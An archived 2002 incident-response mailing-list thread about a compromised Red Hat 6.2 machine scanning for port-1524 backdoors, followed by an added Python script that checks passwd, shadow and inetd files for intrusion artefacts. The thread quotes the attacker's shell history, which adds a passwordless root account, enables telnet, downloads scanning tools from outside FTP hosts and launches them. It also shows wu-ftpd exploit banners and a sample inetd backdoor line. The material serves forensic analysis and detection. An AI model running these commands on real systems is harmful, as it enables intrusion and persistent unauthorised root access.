Security Incidents mailing list archives

Re: Compromised - Port 1524


From: "Jose Miguel Varet" <varet () esatt com>
Date: Wed, 6 Mar 2002 23:53:36 +0100

Eric,

Please note that 'lpd' is running. Within RH6.2, that means a whole home run
for a script kiddie.

Not to mention that, if named was running, again with RH6.2 that would mean
BIND < 8.2.3P5, which in turn means serious trouble.

Those two come to mind at first glance... I cannot tell for sure about
all the other stuff, since I'd have to take a look at some vuln database
first.
Both vulns have well-known and old exploits, very easy to find and use
against such a default installation. Have a look at /var/named, and look
for any strange directory you could see there. If you find something
strange, it's very likely you've been caught via the BIND exploit. Keep in
mind that lpd also gives full root compromise anyway, though.

Greets,


            Jose Miguel Varet
            Security Consultant
            ISIS S.L.




----- Original Message -----
From: "Hines, Eric" <eric3 () exchange cis pitt edu>
To: <incidents () securityfocus com>
Cc: "'Tina Bird'" <tbird () precision-guesswork com>; "'Lance Spitzner'"
<lance () honeynet org>; "'Michael Clark'" <mike () honeynet org>
Sent: Wednesday, March 06, 2002 8:48 PM
Subject: Compromised - Port 1524


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Fellow Analysts:

This morning several of our systems were compromised and I am still
working to find out what exploit was used. Please offer any advice
you can. A utility was left behind along with a massive number of
systems in output log files that were created by this utility. I have
provided all my information below.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
My notes
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
I went through the system and found the following things. The /tmp
directory was the hacker's home directory he was using. Turns out he
deleted that .bash_history file and forgot to nail
/root/.bash_history.
However, it is still unclear to me how he broke in. Notice that he
did an "echo telnetd >>" over to inetd.conf and started up telnetd.
Yeah, he could have run the telnetd b0f exploits against it, but what's
the point? He already had root access to the machine. I also checked
the version of SSHD; I've checked its version against my 500 TARGETS
for ./x2, ./x3 and ./x5 and it doesn't seem to match anything. I checked
to see if snmp was running (it wasn't running). Does anyone know if
the Redhat 6.2 default install contained a vulnerable wu_ftpd?
Unfortunately the machine was rebuilt before I could check the
version of wu_ftpd. I went ahead and checked my exploits for it and
wonder if anyone here had any default wuftpd installs of Redhat 6.2
hit? If anyone has responded to a similar machine, please let me
know!

Eric



[loki@tigerteam1 woot]$ ./forcer -t0
./forcer magic
./forcer <type> <addr>
1) RH7.2 -  2.6.2(1) Wed Aug 9 05:54:50 EDT 2002
2) RH7.2 - wu-2.6.2(2)
3) Special  wu-2.6.3(3)

[loki@tigerteam1 new]$ ./wu-sploit -t0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

num . description
----+-------------------------------------------------------
  1 | Caldera eDesktop|eServer|OpenLinux 2.3 update
[wu-ftpd-2.6.1-13OL.i386.rpm]
  2 | Debian potato [wu-ftpd_2.6.0-3.deb]
  3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
  4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
  5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
  6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
  7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
  8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
  9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
 26 | SuSE 7.0 [wuftpd.rpm]
 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
 28 | SuSE 7.1 [wuftpd.rpm]
 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
 30 | SuSE 7.2 [wuftpd.rpm]
 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
 32 | SuSE 7.3 [wuftpd.rpm]
 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
 34 | Slackware 7.1


[root@tigerteam1 floppy]# telnet 192.168.0.1 22

Connected to 192.168.0.1 22
Escape character is '^]'.
SSH-1.99-OpenSSH_3.0.2p1




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
System Info
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Redhat 6.2 (default install)
SSHD
RPC*



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# ps -aux
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root         1  0.0  0.1  1120  416 ?        S    Feb25   0:04 init
root         2  0.0  0.0     0    0 ?        SW   Feb25   0:00 [keventd]
root         3  0.0  0.0     0    0 ?        SW   Feb25   0:00 [kapm-idled]
root         4  0.0  0.0     0    0 ?        SWN  Feb25   0:00 [ksoftirqd_CPU0]
root         5  0.0  0.0     0    0 ?        SW   Feb25   0:10 [kswapd]
root         6  0.0  0.0     0    0 ?        SW   Feb25   0:00 [kreclaimd]
root         7  0.0  0.0     0    0 ?        SW   Feb25   0:00 [bdflush]
root         8  0.0  0.0     0    0 ?        SW   Feb25   0:00 [kupdated]
root         9  0.0  0.0     0    0 ?        SW   Feb25   0:00 [khubd]
bin        348  0.0  0.1  1212  484 ?        S    Feb25   0:00 portmap
rpcuser    368  0.0  0.2  1340  544 ?        S    Feb25   0:00 rpc.statd
root       382  0.0  0.1  1104  400 ?        S    Feb25   0:00 /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r
root       434  0.0  0.1  1208  444 ?        S    Feb25   0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc
root       436  0.0  0.1  1208  500 ?        S    Feb25   0:00 /usr/sbin/automount --timeout 60 /home file /etc/auto.home
root       441  0.0  0.1  1208  444 ?        S    Feb25   0:00 /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto
root       483  0.0  0.3  6264 1016 ?        S    Feb25   0:00 /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek
root       502  0.0  0.1  1172  500 ?        S    Feb25   0:06 syslogd -m 0
root       511  0.0  0.1  1944  436 ?        S    Feb25   0:10 klogd
nobody     525  0.0  0.2  1312  600 ?        S    Feb25   0:00 identd -e -o
nobody     529  0.0  0.2  1312  600 ?        S    Feb25   0:00 identd -e -o
nobody     530  0.0  0.2  1312  600 ?        S    Feb25   0:03 identd -e -o
nobody     531  0.0  0.2  1312  600 ?        S    Feb25   0:03 identd -e -o
nobody     532  0.0  0.2  1312  600 ?        S    Feb25   0:00 identd -e -o
daemon     543  0.0  0.1  1144  464 ?        S    Feb25   0:00 /usr/sbin/atd
root       557  0.0  0.2  1328  556 ?        S    Feb25   0:00 crond
root       575  0.0  0.1  1156  496 ?        S    Feb25   0:00 inetd
root       589  0.0  0.1  1204  440 ?        S    Feb25   0:00 lpd
root       615  0.0  0.1  1192  316 ?        S    Feb25   0:00 rpc.rquotad
root       645  0.0  0.1  1248  364 ?        S    Feb25   0:00 rpc.mountd
root       654  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       655  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       656  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       657  0.0  0.0     0    0 ?        SW   Feb25   0:00 [lockd]
root       658  0.0  0.0     0    0 ?        SW   Feb25   0:00 [rpciod]
root       659  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       660  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       661  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       662  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
root       663  0.0  0.0     0    0 ?        SW   Feb25   0:00 [nfsd]
condor     696  0.0  0.4  2816 1080 ?        S    Feb25   1:12 /auto/condor/sbin/condor_master
condor     704  0.0  0.6  3596 1576 ?        S    Feb25   0:56 condor_startd -f
condor     715  0.0  0.4  3324 1060 ?        S    Feb25   0:00 condor_schedd -f
root       741  0.0  0.3  2432  780 ?        S    Feb25   0:00 sendmail: accepting connections
root       756  0.0  0.1  1156  408 ?        S    Feb25   0:00 gpm -t imps2
xfs        803  0.0  0.4  3404 1072 ?        S    Feb25   0:01 xfs -droppriv -daemon -port -1
root       846  0.0  0.2  2092  672 ?        S    Feb25   0:29 sshd
root       852  0.0  0.1  1092  336 tty1     S    Feb25   0:00 /sbin/mingetty tty1
root       853  0.0  0.1  1092  336 tty2     S    Feb25   0:00 /sbin/mingetty tty2
root       854  0.0  0.1  1092  336 tty3     S    Feb25   0:00 /sbin/mingetty tty3
root       855  0.0  0.1  1092  336 tty4     S    Feb25   0:00 /sbin/mingetty tty4
root       858  0.0  0.1  1092  336 tty5     S    Feb25   0:00 /sbin/mingetty tty5
root       859  0.0  0.1  1092  336 tty6     S    Feb25   0:00 /sbin/mingetty tty6
root       860  0.0  0.2  2744  620 ?        S    Feb25   0:00 /usr/bin/gdm -nodaemon
root       865  2.8  2.5 48200 6564 ?        S    Feb25 358:24 /etc/X11/X -auth /var/gdm/:0.Xauth :0
root       866  0.0  0.3  3452  972 ?        S    Feb25   0:00 /usr/bin/gdm -nodaemon
turnshek 19979  0.0  0.7  5640 1864 ?        S    Mar03   0:00 /usr/bin/gnome-session
turnshek 20009  0.0  0.6  5436 1596 ?        S    Mar03   0:00 gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client-
turnshek 20013  0.0  0.6  4376 1676 ?        S    Mar03   0:03 enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile
turnshek 20019  0.9  0.7  5968 2036 ?        S    Mar03  32:05 magicdev --sm-client-id 11888e7113000098519292400000009670005
turnshek 20030  0.0  0.3  2636  804 ?        S    Mar03   0:00 gnome-name-service
turnshek 20032  0.0  1.0  7072 2652 ?        S    Mar03   0:01 panel --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188
turnshek 20034  0.0  0.6  3188 1648 ?        S    Mar03   0:05 xscreensaver -no-splash -timeout 20 -nice 10
turnshek 20036  0.0  0.9  7536 2404 ?        S    Mar03   0:00 gmc --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851
turnshek 20042  0.0  0.9  6100 2388 ?        S    Mar03   0:09 gnomepager_applet --activate-goad-server gnomepager_applet
turnshek 20044  0.0  0.9  6068 2308 ?        S    Mar03   0:00 gen_util_applet --activate-goad-server gen_util_applet
turnshek 22000  0.1  2.0 56824 5168 ?        S    Mar04   4:55 /usr/lib/netscape/netscape-communicator -irix-session-management
turnshek 22016  0.0  0.2 16660  664 ?        S    Mar04   0:00 (dns helper)
turnshek 22046  0.0  0.8  5832 2096 ?        S    Mar04   0:08 gnome-terminal
turnshek 22047  0.0  0.1  1144  440 ?        S    Mar04   0:00 gnome-pty-helper
turnshek 22048  0.0  0.2  2424  600 pts/0    S    Mar04   0:00 -csh
turnshek 25361  0.0  0.8  5800 2100 ?        S    Mar05   0:00 gnome-terminal
turnshek 25362  0.0  0.1  1144  440 ?        S    Mar05   0:00 gnome-pty-helper
turnshek 25363  0.0  0.2  2424  600 pts/1    S    Mar05   0:00 -csh
root      7402  0.0  0.3  1704  928 ?        S    03:49   0:00 bash -i
root      9237  0.0  0.1  1112  404 ?        S    04:50   0:00 tail -f 211.out
root      9506  0.0  0.1  1104  396 ?        S    05:07   0:00 tail -f 211.out
root     10302  0.0  0.1  1100  384 ?        S    06:35   0:00 tail -f 122.out
root     11808  9.8  0.2  1416  692 ?        RN   07:36   0:25 ./synscan 130 130.out eth0 30000 1524
root     11812 52.3  0.2  1412  692 ?        RN   07:36   2:13 ./synscan 130 130.out eth0 30000 1524
root     11817  0.0  0.0     0    0 ?        ZN   07:38   0:00 [synscan <defunct>]
root     11818  0.0  0.0     0    0 ?        ZN   07:38   0:00 [synscan <defunct>]
root     11819  0.0  0.0     0    0 ?        ZN   07:38   0:00 [synscan <defunct>]
root     11820  0.0  0.0     0    0 ?        ZN   07:38   0:00 [synscan <defunct>]
root     11821  0.0  0.0     0    0 ?        ZN   07:38   0:00 [synscan <defunct>]
root     11822  0.0  0.0     0    0 ?        ZN   07:39   0:00 [synscan <defunct>]
turnshek 11825 26.4  2.6 21660 6864 ?        RN   07:39   0:16 sproingies -root
root     11830  0.0  0.0     0    0 ?        ZN   07:39   0:00 [synscan <defunct>]
root     11834  0.6  0.6  2996 1580 ?        S    07:40   0:00 sshd
root     11835  0.0  0.3  1724  972 pts/2    S    07:40   0:00 -bash
root     11859  0.0  0.3  2556  872 pts/2    R    07:40   0:00 ps -augxw

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Contents of /etc/passwd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
u:x:12347:12347::/tmp:/bin/bash
r:x:0:12348::/tmp:/bin/bash


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Output generated by synscan1.6.tar (contains IP addresses of systems with
port 1524 (ingreslock) open, logging connections that produce a # prompt)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
122.out
128.out
130.out
218.out


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
.bash_history
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


uname -a;
cat /proc/cpuifo;
cat /proc/cpuinfo'
';
cat /proc/cpuinfo;
ping -c 5 www.yahoo.com;
/usr/sbin/adduser -p "" u;
tail /etc/passwd;
/usr/sbin/adduser -p "" -d /tmp u;
/usr/sbin/adduser -p "" -d /tmp -u 0 r;
grep rsdh /etc/inetd.conf;
grep rsh /etc/inetd.conf;
grep shell /etc/inetd.conf;
cat /etc/inetd.conf;
ls -al /etc/inetd.conf;
locate ...;
/sbin/ifconfig -a;
dmesg | grep -i promi;
tail /etc/rc.d/rc.local;
ps auwx| grep named;
cat /etc/redhat-rel*;
ps auwx| grep stat;
exit;
la -L /UAE/AVIN/IN.DRPS;
ls -al /usr/sbin/in.ftpd;
locate in.ftpd;
tail /etc/passwd;
echo "telnet  stream  tcp     nowait  root    /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf;
ps auwx| grep inetd;
kill -HUP 575;
exit;
cat /etc/hosts.deny;
mv /etc/hosts.deny /etc/host.deny;
exit;
locate in.rlogin;
ls -al /usr/sbin/in.*;
locate telnet;
ping -c 10 www.yahoo.com;
wget;
which lynx;
ncftp
cd /tmp;
#cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf /root/.ncftp;chmod 755 t0rnscan;
cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.172.226.26/../../tmp/synscan;
ls -al;
cat fuk.ps;
chmod 755 synscan;
nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null 2>/dev/null&2>/dev/null;
ping -c 5 www.yahoo.com;
ls -al 216.out;
ls -al 216.out;
grep "#" 216.out;
ls -al 216.out;
grep "#" 216.out;exit;
cd /tmp;
grep "#" *.out;
tail 216.out;
tail 216.out;
tail 216.out;
grep access *.out;
tail 216.out;
grep "#" 216.out;
tail 216.out;
tail 216.out;
tail 216.out;
ps auwx| grep synscan;
tail 216.out;
tail 216.out;
killall -9 synscan;
egrep "access|#" *.out;
rm -rf 216.out;
killall -9 synscan;
nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null;
ping -c 5 www.yahoo.com;
ls -al 217.out;
cat 217.out;
cat 217.out;
tail 217.out;
grep "#" 217.out;
tail 217.out;
tail 217.out;
tail 217.out;
tail 217.out;
grep "#" 217.out;
tail 217.out;
grep "#" 217.out | grep -v root;
tail 217.out;
tail 217.out;
tail 217.out;
tail 217.out;
tail 217.out;
grep "#" 217.out;
tail 217.out;

tai217.out;
tail 217.out;
grep "#" 217.out | grep -v root;
rm -rf 217.out;
nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null;
ls -al 218.out;
ls -al 218.out;
ls -al 218.out;
cat 218.out;
exit;
cd /tmp;
ls;
tail 218.out;
grep "#" 218.out;
tail *.out;
killall -9 synscan;
nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null 2>/dev/null&2>/dev/null;
ls -al 24.out;
ls -al 24.out;
ls -al 24.out;
ls -al 24.out;
p[s auwwx| grep synscan;
ps auwx| grep synscan;
ls -al 24.out;
ls -al 24.out;
ls -al 24.out;
ls -al 24.out;
ping -c 5 www.yahoo.com;
ping -c 5 www.yahoo.com;
ls -al 24.out;
killall -9 synscan;
nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null 2>/dev/null&2>/dev/null;
ping -c 5 www.yahoo.com;
tail -f 24.out&2 >/dev/null;
ps auwx| grep tail;
ls -al 24.out;
 /
/sbin/ifconfig -a;
locate tcp.log;
last| head -5;
tail /home/sandhya/.bash_history;
ls -al ~sandhya;
cat /home/sandhya/.history;
cat ~sandhya/.history;
w;
ls -al 24.out;



================================================
Eric S. Hines
Technical Lead
Information Security Group
Computer Security Incident Response Team (CSIRT)
------------------------------------------------
University of Pittsburgh
Cathedral of Learning #701
Pittsburgh PA, 15260
[ph] +1 412 624-6728
[mo] +1 412 334-2379
[em] eric3 () pitt edu
[al] 4123342370 () msg myvzw com
================================================

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBPIZyXz4GESb0uqLMEQInbgCggBloMYEHfCWVbgcNKRTsu06Z/FAAnjgq
wg9hokf1qGcgcYLiBI8iq+rj
=2dWC
-----END PGP SIGNATURE-----

--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



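The following Python script is an added example; it is not part of either message above and not a tool either poster used. It automates the three artefact checks Eric's post walks through by hand: /etc/passwd for a second UID 0 account and for accounts homed in /tmp (the `u` and `r` entries), /etc/shadow for the empty hash field that `adduser -p ""` leaves behind (the shadow lines are constructed; the post only shows passwd), and /etc/inetd.conf for the appended telnet entry and for any entry that serves a shell directly, which is the shape of backdoor a port-1524 ingreslock scan is hunting for. The function names, the `SHELL_SERVICES`/`SHELL_PROGRAMS` lists and every sample line other than the two quoted passwd entries are mine.

```python
"""Offline triage of the three artefacts examined in the post above.
Added example: the sample file contents below are constructed, and the
shadow lines are an assumption about what `adduser -p ""` leaves behind
(an empty hash field, i.e. no password required to log in)."""
import os
from typing import Iterator, List, NamedTuple, Optional, Tuple


class Finding(NamedTuple):
    check: str    # which rule fired
    subject: str  # account or service name, or "line N" for parse errors
    detail: str   # human-readable context


# inetd services that hand out a shell or a cleartext login.  ingreslock
# (tcp/1524) is listed because that is the port the attacker's synscan was
# probing for hosts that answer with a "#" prompt.
SHELL_SERVICES = {"telnet", "shell", "login", "exec", "ingreslock"}
SHELL_PROGRAMS = {"sh", "bash", "csh", "tcsh", "ksh"}


def _records(text: str, nfields: int) -> Iterator[Tuple[int, Optional[List[str]]]]:
    """Yield (lineno, fields) for each non-blank, non-comment line;
    fields is None when the colon-separated field count is wrong."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        yield lineno, (fields if len(fields) == nfields else None)


def check_passwd(passwd_text: str) -> List[Finding]:
    """Flag extra UID 0 accounts and accounts homed in a world-writable tmp dir."""
    out: List[Finding] = []
    for lineno, f in _records(passwd_text, 7):
        if f is None:
            out.append(Finding("malformed", f"line {lineno}", "expected 7 fields"))
            continue
        name, _pw, uid, _gid, _gecos, home, shell = f
        if uid == "0" and name != "root":
            out.append(Finding("uid0-alias", name, f"second UID 0 account, shell={shell}"))
        if home in ("/tmp", "/var/tmp") or home.startswith(("/tmp/", "/var/tmp/")):
            out.append(Finding("tmp-home", name, f"home directory is {home}"))
    return out


def check_shadow(shadow_text: str) -> List[Finding]:
    """Flag accounts whose hash field is empty: login succeeds with no password."""
    out: List[Finding] = []
    for lineno, f in _records(shadow_text, 9):
        if f is None:
            out.append(Finding("malformed", f"line {lineno}", "expected 9 fields"))
            continue
        if f[1] == "":
            out.append(Finding("empty-password", f[0], "empty hash field in shadow"))
    return out


def check_inetd(inetd_text: str) -> List[Finding]:
    """Flag enabled shell/cleartext-login services and entries that exec a shell."""
    out: List[Finding] = []
    for lineno, line in enumerate(inetd_text.splitlines(), 1):
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if len(parts) < 6:
            out.append(Finding("malformed", f"line {lineno}", "inetd entry too short"))
            continue
        service, user, server = parts[0], parts[4], parts[5:]
        # An entry whose server program is itself a shell is a backdoor,
        # whatever service name it hides behind.
        if os.path.basename(server[0]) in SHELL_PROGRAMS:
            out.append(Finding("inetd-shell-backdoor", service,
                               f"serves {' '.join(server)} as {user}"))
        elif service in SHELL_SERVICES:
            out.append(Finding("shell-service-enabled", service,
                               f"{' '.join(server)} as {user}"))
    return out


def triage(passwd_text: str, shadow_text: str, inetd_text: str) -> List[Finding]:
    return check_passwd(passwd_text) + check_shadow(shadow_text) + check_inetd(inetd_text)


# Constructed samples.  The u/r passwd lines are the ones quoted in the post;
# everything else is filler in the same format.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
turnshek:x:500:500::/home/turnshek:/bin/csh
u:x:12347:12347::/tmp:/bin/bash
r:x:0:12348::/tmp:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$1$constructed$notarealhash.:11740:0:99999:7:::
turnshek:$1$constructed$notarealhash.:11740:0:99999:7:::
u::11753:0:99999:7:::
r::11753:0:99999:7:::
"""
INETD_SAMPLE = """\
# constructed excerpt; the telnet line is the one the history shows being appended
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
#shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd in.telnetd
ingreslock stream tcp nowait root /bin/sh sh -i
"""

if __name__ == "__main__":
    for f in triage(PASSWD_SAMPLE, SHADOW_SAMPLE, INETD_SAMPLE):
        print(f"[{f.check}] {f.subject}: {f.detail}")
```

Run it against copies of the three files pulled off a suspect host (or a mounted image) rather than on the live box, since the attacker in this thread was already renaming files such as /etc/hosts.deny. The passwd check keys on the UID rather than the username because the extra root account here was called `r`, which no name-based rule would catch.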